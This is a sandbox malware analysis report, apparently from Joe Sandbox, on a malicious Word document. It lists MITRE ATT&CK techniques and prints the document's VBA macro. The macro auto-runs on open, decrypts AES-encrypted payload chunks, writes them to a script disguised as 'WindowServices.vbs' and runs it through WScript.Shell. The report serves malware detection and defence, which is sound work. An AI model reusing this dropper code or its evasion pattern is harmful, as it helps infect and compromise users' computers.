39	part19 = "HsS3ddDuf6EbxorfddYWNkOV3TvdwWNH3HpYmBq8GrjgxVoNDSw6E8eLoyqIXvqs1DxlLY/uHNorxP9iDGO2ZYMQ0qY3x6te3GbKJZKl3OekMFxDqkhqCE8IJSYTwSbAxNA2K6DHYsT/vDVm9OsrE+"
40	part20 = "c2mPNjYheGhsI9AI48kBXTJcVdKNXyDdegX3K4O757DjlbkPTjmgpV0OWum/axEOdwfCBykOjb7WJw4LvLaZo08Hahku87InP6PbcV4DNRou1RgjHp0NZban9TeRc/3zAQQuzRcXMk2CfO83CTE+fn"
41	part21 = "2VtluxczXmPsqd1boUbJTHJqxu8/43ICU1wduq4SM4YoQTBLYnhlBhn8vYBbW62jHOJqVtfj6xVksqFrCT71i1duHfhRGQLKlRTjnK6GS8Hy7IkuJjfTW4yuVwUAljPSFLJjzH+ZdfLQUnVyJ8Mjp5"
42	part22 = "Yo4PaUOkPABOieg8Qne25eflW34sILpeymCECFYOk8w/veOnLjgAMEqow24oa7epvSaAQgjzkjkLCpPnJ+CxKvUbFkZWVAs6xkP76iD+6kxPBAglXqIG2HNCSGucUwUk9HUE0rij3PIjsyMiW9Xhrz"
43	part23 = "7VOCW1hbYBBP2V3JGotCL6en9V3EvgCOm42brJhx6jIY8IzvDDUC+EnfnJmUUfFfDgZyVV4Yi1L+m4tdQhjbzVcEz0PyGGjcmk8o9FRd4mfVYPEmN3NQBxP3xEK4hx8uPXUA4aGj+8CXfWSvrzeLNg"
44	part24 = "VqtTEkJLtTukhKEe977DegbZo9Q132SqvT6kjAzJ+UCcHjDDctQFmdMF5PfFle"
45	Dim encryptedText as String
46	encryptedText = part1 & part2 & part3 & part4 & part5 & part6 & part7 & part8 & part9 & part10 & part11 & part12 & part13 & part14 & part15 & part16 & part17 & part18 & part19 & part20 & part21 & part22 & part23 & part24
47	decryptedText = AesDecryptString(encryptedText, key)
50	chunkSize = 3000
51	Dim outputFilePath as String
53	vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"	Environ
56	Open vbsFilePath For Output As # 1	Open
57	For i = 1 To Len(decryptedText) Step chunkSize	Len
58	partText = Mid(decryptedText, i, chunkSize)	Mid
59	Print # 1, partText
60	Next i	Len
61	Close # 1
63	Dim shell as Object
64	Set shell = CreateObject("WScript.Shell")	CreateObject
65	shell.Run """" & vbsFilePath & """", 1, True	Run
68	End Sub

Subroutine
Class_InitializeAPIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
70	Private Sub Class_Initialize()
72	End Sub

Module: ksksksksksksks

Declaration

Line	Content
1	Attribute VB_Name = "ksksksksksksks"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Non-Executed Functions

Subroutine
Document_OpenAPIs: 3, Strings: 1, Number of lines: 3, Relevance: 8.753

APIs	Meta Information
OnTime
Now
TimeValue

Strings	Decrypted Strings
"CallTestAES"

Line	Instruction	Meta Information
9	Private Sub Document_Open()
10	Application.OnTime Now + TimeValue("00:00:01"), "CallTestAES"	OnTime Now TimeValue
11	End Sub

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make a payload or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the device or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Portions of files can also be encoded to hide the plaintext strings that would otherwise help defenders with discovery. Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.
Tactics:	Defense Evasion
Data Sources:
Platforms:	Android, iOS
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0dsIoO7xjt.docx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\~DFA56EB49069BF8E36.TMP

C:\Users\user\AppData\Local\Temp\~DFDD5D69EDAB118754.TMP

C:\Users\user\Desktop\~$sIoO7xjt.doc

Static File Info

General

File Icon

Static OLE Info

General

OLE File "0dsIoO7xjt.docx"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 1446

General

VBA Code

VBA File Name: Module3.bas, Stream Size: 48244

General

VBA Code

VBA File Name: ViewSession.cls, Stream Size: 11833

General

VBA Code

VBA File Name: ksksksksksksks.cls, Stream Size: 1427

General

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

Windows Analysis Report
0dsIoO7xjt.docx

Subroutine
CallTestAESAPIs: 2, Strings: 1, Number of lines: 6, Relevance: 7.006

Function
pvCryptoAesCtrInitAPIs: 45, Strings: 6, Number of lines: 62, Relevance: 91.062

Function
AesCryptArrayAPIs: 119, Strings: 0, Number of lines: 70, Relevance: 148.82

Function
AesEncryptStringAPIs: 83, Strings: 0, Number of lines: 32, Relevance: 103.782

Function
AesDecryptStringAPIs: 79, Strings: 0, Number of lines: 37, Relevance: 98.787

Function
AesChunkedInitAPIs: 46, Strings: 0, Number of lines: 13, Relevance: 57.513

Function
pvCryptoAesCtrCryptAPIs: 30, Strings: 0, Number of lines: 59, Relevance: 37.559

Function
AesChunkedCryptArrayAPIs: 21, Strings: 0, Number of lines: 11, Relevance: 26.261

Function
ToBase64ArrayAPIs: 10, Strings: 0, Number of lines: 10, Relevance: 12.51

Function
ToUtf8ArrayAPIs: 9, Strings: 0, Number of lines: 13, Relevance: 11.263

Function
GetSystemMessageAPIs: 9, Strings: 0, Number of lines: 13, Relevance: 11.263

Function
FromUtf8ArrayAPIs: 9, Strings: 0, Number of lines: 9, Relevance: 11.259

Function
FromBase64ArrayAPIs: 7, Strings: 0, Number of lines: 14, Relevance: 8.764

Property
Get pvArrayPtrAPIs: 7, Strings: 0, Number of lines: 9, Relevance: 8.759

Subroutine
pvCryptoAesCtrTerminateAPIs: 5, Strings: 0, Number of lines: 24, Relevance: 6.274

Property
Get pvArraySizeAPIs: 5, Strings: 0, Number of lines: 7, Relevance: 6.257

Function
pvCryptoGetFinalHashAPIs: 4, Strings: 0, Number of lines: 7, Relevance: 5.007

Function
pvIncAPIs: 2, Strings: 0, Number of lines: 10, Relevance: 2.51

Function
AesChunkedGetLastErrorAPIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

Function
PeekPtrAPIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

Subroutine
ikwiwiejs_19293_AdeAPIs: 34, Strings: 28, Number of lines: 49, Relevance: 110.299

Subroutine
Class_InitializeAPIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Subroutine
Document_OpenAPIs: 3, Strings: 1, Number of lines: 3, Relevance: 8.753